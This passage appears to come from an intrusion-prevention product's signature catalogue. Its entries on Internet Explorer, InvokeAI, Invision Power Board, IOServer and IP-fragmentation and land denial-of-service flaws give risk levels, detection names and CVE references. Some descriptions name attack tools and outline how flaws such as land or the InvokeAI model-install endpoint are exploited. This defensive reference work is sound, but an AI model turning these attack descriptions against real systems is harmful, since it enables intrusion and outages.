http://technet.microsoft.com/security/bulletin/ms21-mar
Back to top

Internet_Explorer_Remote_Code_Execution_Vulnerability_CVE-2020-0968

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1241-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a use-after-free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Remote_Code_Execution_Vulnerability_CVE-2020-0968
References:
CVE-2020-0968
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0968
ms20-apr
http://technet.microsoft.com/security/bulletin/ms20-apr
Back to top

Internet_Explorer_Remote_Code_Execution_Vulnerability_CVE-2021-26419

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1347-5242
Last changed: sgpkg-ips-1347-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a remote code execution vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Remote_Code_Execution_Vulnerability_CVE-2021-26419
References:
CVE-2021-26419
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26419
ms21-may
http://technet.microsoft.com/security/bulletin/ms21-may
Back to top

Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0824

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1229-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a scripting engine vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0824
References:
CVE-2020-0824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0824
ms20-mar
http://technet.microsoft.com/security/bulletin/ms20-mar
Back to top

Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0832

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1229-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a scripting engine vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0832
References:
CVE-2020-0832
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0832
ms20-mar
http://technet.microsoft.com/security/bulletin/ms20-mar
Back to top

Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0833

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1229-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a scripting engine vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0833
References:
CVE-2020-0833
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0833
ms20-mar
http://technet.microsoft.com/security/bulletin/ms20-mar
Back to top

Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0847

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1229-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a scripting engine vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0847
References:
CVE-2020-0847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0847
ms20-mar
http://technet.microsoft.com/security/bulletin/ms20-mar
Back to top

Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2021-34448

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1369-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a scripting engine vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2021-34448
References:
CVE-2021-34448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34448
ms21-jul
http://technet.microsoft.com/security/bulletin/ms21-jul
Back to top

Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-0920

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Type Confusion
Description: There exists a type confusion vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-0920
References:
CVE-2019-0920
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0920
ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun
Back to top

Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-1238

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1195-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Type Confusion
Description: There exists a type confusion vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-1238
References:
CVE-2019-1238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1238
ms19-oct
http://technet.microsoft.com/security/bulletin/ms19-oct
Back to top

Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-1239

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1195-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Type Confusion
Description: There exists a type confusion vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-1239
References:
CVE-2019-1239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1239
ms19-oct
http://technet.microsoft.com/security/bulletin/ms19-oct
Back to top

Internet_Explorer_Type_Confusion_Vulnerability_CVE-2020-1216

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Type Confusion
Description: There exists a type confusion vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2020-1216
References:
CVE-2020-1216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1216
ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun
Back to top

Internet_Explorer_Type_Confusion_Vulnerability_CVE-2020-1230

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Type Confusion
Description: There exists a type confusion vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2020-1230
References:
CVE-2020-1230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1230
ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun
Back to top

Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1035

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1249-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a use-after-free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1035
References:
CVE-2020-1035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1035
ms20-may
http://technet.microsoft.com/security/bulletin/ms20-may
Back to top

Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1060

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1249-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a use-after-free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1060
References:
CVE-2020-1060
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1060
ms20-may
http://technet.microsoft.com/security/bulletin/ms20-may
Back to top

Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1062

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1249-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a use-after-free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1062
References:
CVE-2020-1062
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1062
ms20-may
http://technet.microsoft.com/security/bulletin/ms20-may
Back to top

Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1213

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a Use-After-Free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1213
References:
CVE-2020-1213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1213
ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun
Back to top

Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1214

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a Use-After-Free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1214
References:
CVE-2020-1214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1214
ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun
Back to top

Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1215

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a Use-After-Free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1215
References:
CVE-2020-1215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1215
ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun
Back to top

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0793

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0793
References:
CVE-2019-0793
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0793
ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr
Back to top

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0862

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0862
References:
CVE-2019-0862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0862
ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr
Back to top

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0918

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1159-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0918
References:
CVE-2019-0918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0918
ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may
Back to top

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0930

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1159-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0930
References:
CVE-2019-0930
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0930
ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may
Back to top

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0988

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0988
References:
CVE-2019-0988
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0988
ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun
Back to top

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1005

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1005
References:
CVE-2019-1005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1005
ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun
Back to top

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1055

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1055
References:
CVE-2019-1055
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1055
ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun
Back to top

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1060

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1195-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1060
References:
CVE-2019-1060
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1060
ms19-oct
http://technet.microsoft.com/security/bulletin/ms19-oct
Back to top

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1390

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1201-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1390
References:
CVE-2019-1390
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1390
ms19-nov
http://technet.microsoft.com/security/bulletin/ms19-nov
Back to top

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1429

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1201-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1429
References:
CVE-2019-1429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1429
ms19-nov
http://technet.microsoft.com/security/bulletin/ms19-nov
Back to top

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2020-0674

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1217-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2020-0674
References:
CVE-2020-0674
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0674
Back to top

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2020-1260

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2020-1260
References:
CVE-2020-1260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1260
ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun
Back to top

InterScan-VirusWall-Directory-Traversal

About this vulnerability: A vulnerability in InterScan VirusWall
Risk: High
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1602-5242
Platform: Windows
Software: InterScan VirusWall
Type: Directory Traversal
Description: The proxy product within TrendMicro InterScan is vulnerable to a directory traversal attack. A remote attacker can enumerate the underlying file system and access files that are not meant to be accessible to the attacker. Since TrendMicro Interscan runs under LOCAL_SYSTEM privileges, it is possible for the remote attacker to gain access to all the files on the remote server.
Back to top

Intersystems-Cache-DoS-1

About this vulnerability: A vulnerability in Intersystems Cache, allowing DoS.
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Intersystems Cache
Type: Malfunction
Description: A vulnerability exists in Intersystems Cache for Windows which allows for a DoS attack.
Situation: HTTP_CSU-Intersystems-Cache-DoS-1
Back to top

Intersystems-Cache-DoS-2

About this vulnerability: A vulnerability in Intersystems Cache, allowing DoS.
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Intersystems Cache
Type: Malfunction
Description: A vulnerability exists in Intersystems Cache for Windows which allows for a DoS attack.
Situation: HTTP_CSU-Intersystems-Cache-DoS-2
Back to top

Invalid-Base64-Cookie

About this vulnerability: Invalid Base64-encoded cookie field
Risk: Moderate
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Invalid HTTP headers may be used to mask botnet control traffic.
Situation: HTTP_CSH-Invalid-Base64-Cookie
Back to top

Invalid-Basic-Authentication-Base64

About this vulnerability: Invalid Characters in HTTP Basic Authentication detected
Risk: Low
First detected in: sgpkg-ips-500-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP server
Type: Input Validation
Description: HTTP Basic Authentication utilizes MIME-Base64 encoding to pass the authorization data. Non-compliant characters may indicate an attack or probing attempt against the web-server.
Situation: HTTP_CSH-Invalid-Basic-Authentication-Base64
Back to top

Invalid-HTTP-Response

About this vulnerability: An invalid HTTP response
Risk: Low
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: An invalid HTTP response may contain extra characters after the end of the headers or the content-length may have been missing from a response that contains payload. This may be caused by a misconfigured or malfunctioning HTTP server.
Situation: HTTP_SHS-HTTP-0.9-Response
HTTP_SHS-Invalid-Response-HTTP-1.1
HTTP_SHS-Invalid-Response-HTTP-1.0
Back to top

Invensys-Wonderware-SCADA-ActiveX-Buffer-Overflow-Vulnerability

About this vulnerability: A vulnerability in Invensys Wonderware
Risk: Moderate
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Invensys Wonderware
Type: Buffer Overflow
Description: Stack-based buffer overflow in the IConfigurationAccess interface in the Invensys Wonderware Archestra ConfigurationAccessComponent ActiveX control in Wonderware Application Server (WAS) before 3.1 SP2 P01, as used in the Wonderware Archestra Integrated Development Environment (IDE) and the InFusion Integrated Engineering Environment (IEE), allows remote attackers to execute arbitrary code via the first argument to the UnsubscribeData method.
Situation: File-Text_Multiple-ActiveX-Buffer-Overflow-Vulnerability-2
File-Text_Multiple-ActiveX-Buffer-Overflow-Vulnerabilities
References:
CVE-2010-2974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2974
Back to top

Invisible-Inline-Frame

About this vulnerability: Sizeless inline frame (IFRAME) in HTML document
Risk: Moderate
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic browser
Type: Malfunction
Description: Hypertext Markup Language (HTML) contains an inline frame feature. This feature can be used to include other pages in the current page. It is also possible to set the inline frame size to zero, which effectively means that the frame is not visible. This kind of frames are often used to gather statistics and load external scripts. However, the invisible frame is also commonly used to track users and download malware.
Situation: HTTP_Invisible-Inline-Frame
File-Text_Invisible-Inline-Frame
Back to top

Invision-Power-Board-Index-Php-SQL-Injection

About this vulnerability: SQL injection vulnerability in Invision Power Board
Risk: Low
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Invision Power Board
Type: SQL Injection
Description: Invision Power Board has an SQL injection vulnerability. A remote attacker can send a specially crafted HTTP request to the vulnerable index.php script containing an sql query and obtain sensitive information.
References:
CVE-2004-1531
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1531
BID-11703
http://www.securityfocus.com/bid/11703
OSVDB-11929
http://www.osvdb.org/11929
Back to top

Invision-Power-Board-PHP-Remote-Code-Execution

About this vulnerability: A PHP remote code execution vulnerability in Invision Power Board
Risk: High
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Invision Power Board
Type: PHP Injection
Description: A PHP unserialize() vulnerability in Invision Power Board, 3.3.4 and earlier, that allows remote attackers to write arbitrary PHP code to a file on the Invision IP.Board web directory, and execute remote code under the context of the webserver user.
Situation: HTTP_CS-Invision-Power-Board-PHP-Remote-Code-Execution
References:
CVE-2012-5692
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5692
BID-56288
http://www.securityfocus.com/bid/56288
OSVDB-86702
http://www.osvdb.org/86702
Back to top

Invisionix-IRSR-Remote-PHP-Inclusion

About this vulnerability: A remote code execution vulnerability in Invisionix IRSR
Risk: High
First detected in: sgpkg-ips-786-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Invisionix
Type: Input Validation
Description: There exists a remote PHP inclusion vulnerability in Invisionix IRSR version 0.2 and earlier.
Situation: HTTP_CRL-Invisionix-IRSR
References:
CVE-2006-4237
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4237
Back to top

InvokeAI-RCE

About this vulnerability: A vulnerability in InvokeAI
Risk: High
First detected in: sgpkg-ips-1842-5242
Last changed: sgpkg-ips-1842-5242
Platform: Linux
Software: InvokeAI
Type: Input Validation
Description: A vulnerability in InvokeAI which allows remote attackers to embed malicious code in model file and supply the model URL to the server via /api/v2/models/install, which the server will then download and load without proper validation.
Situation: File-Text_InvokeAI-RCE
References:
CVE-2024-12029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12029
Back to top

IOServer-Directory-Traversal

About this vulnerability: A vulnerability in IOServer
Risk: High
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IOServer
Type: Malfunction
Description: There is a directory traversal vulnerability in IOServer. Successful exploitation by a remote attacker could result in the disclosure of any system file.
Situation: HTTP_CSU-IOServer-Directory-Traversal
Back to top

IOServer-OPC-Server-DoS

About this vulnerability: A vulnerability in IOServer OPC Server
Risk: Moderate
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IOServer
Type: Malfunction
Description: There is a denial of service vulnerability in IOServer OPC Server
Situation: Generic_CS-IOServer-OPC-Server-DoS
Back to top

IP-Address-As-HTTP-Host

About this vulnerability: IP address as HTTP host
Risk: Moderate
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: An IP address was used as the host in an HTTP request
Situation: HTTP_CSH-IP-Address-As-HTTP-Host
Back to top

IP-Bonk-IP-Fragmentation-Denial-Of-Service

About this vulnerability: Bonk variation of teardrop IP fragmentation denial of service
Risk: Low
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: -
Software: <os>
Type: Malfunction
Description: There is a vulnerability in the IP defragmentation routines of certain IP stacks. A remote attacker may exploit this by sending crafted IP fragments. A successful exploit leads to a Denial of Service condition. This vulnerability can be exploited, for example, with tools called "bonk", "boink" and "targa".
Situation: DOS_BONK
References:
CVE-1999-0258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0258
OSVDB-5730
http://www.osvdb.org/5730
Back to top

IP-Cisco-Malformed-Packet-IP-Phone-Crash

About this vulnerability: Some versions of Cisco IP phones crash when receiving malformed IP packets
Risk: Low
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Cisco
Software: Cisco IP Phone
Type: Malfunction
Description: Cisco IP Phone (VoIP) models 7910, 7940, and 7960 allow remote attackers to cause a denial of service via malformed packets. The following attack tools are known to cause the denial of service: (1) "jolt", (2) "jolt2", (3) "raped", (4) "hping2", (5) "bloop", (6) "bubonic", (7) "mutant", (8) "trash", and (9) "trash2. Other attack tools may also cause a denial of service.
Situation: DOS_JOLT
References:
CVE-2002-0880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0880
Back to top

IP-ICMP-1234.c-DoS

About this vulnerability: TCP/IP ICMP fragmentation flaw
Risk: Moderate
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: Certain TCP/IP stacks are vulnerable to 1234.c fragmentation attacks. A successful attack causes the target machine to halt, making it inoperable.
Situation: DOS_1234
Back to top

IP-Land-DoS

About this vulnerability: Land Denial of Service Vulnerability
Risk: Moderate
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: A TCP SYN packet with the same source and destination addresses and the same source and destination ports may cause a denial of service. The vulnerability exists in multiple operating systems. A tool called "land.c" exploits this vulnerability, thus the vulnerability is often called as "land". See also CVE entries: CVE-2005-0688, CVE-2005-1649, CVE-2005-4215, CVE-2005-4257, CVE-2005-4258 , CVE-2005-4275 CVE-2005-4276
Situation: DOS_LAND
References:
CVE-1999-0016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0016
BID-2666
http://www.securityfocus.com/bid/2666
Back to top

IP-Land-DoS-Cisco-Catalyst

About this vulnerability: Land Denial of Service Vulnerability
Risk: Moderate
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: A TCP SYN packet with the same source and destination addresses and the same source and destination ports may cause a denial of service. The vulnerability exists in multiple operating systems. A tool called "land.c" exploits this vulnerability, thus the vulnerability is often called as "land". See also CVE entries: CVE-1999-0016, CVE-2005-0688, CVE-2005-1649, CVE-2005-4215, CVE-2005-4257, CVE-2005-4275 CVE-2005-4276
Situation: DOS_LAND
References:
CVE-2005-4258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4258
BID-15861
http://www.securityfocus.com/bid/15861
Back to top

IP-Land-DoS-Linksys

About this vulnerability: Land Denial of Service Vulnerability
Risk: Moderate
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: A TCP SYN packet with the same source and destination addresses and the same source and destination ports may cause a denial of service. The vulnerability exists in multiple operating systems. A tool called "land.c" exploits this vulnerability, thus the vulnerability is often called as "land". See also CVE entries: CVE-1999-0016, CVE-2005-0688, CVE-2005-1649, CVE-2005-4258 , CVE-2005-4275 CVE-2005-4276
Situation: DOS_LAND
References:
CVE-2005-4257
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4257
BID-15861
http://www.securityfocus.com/bid/15861
Back to top

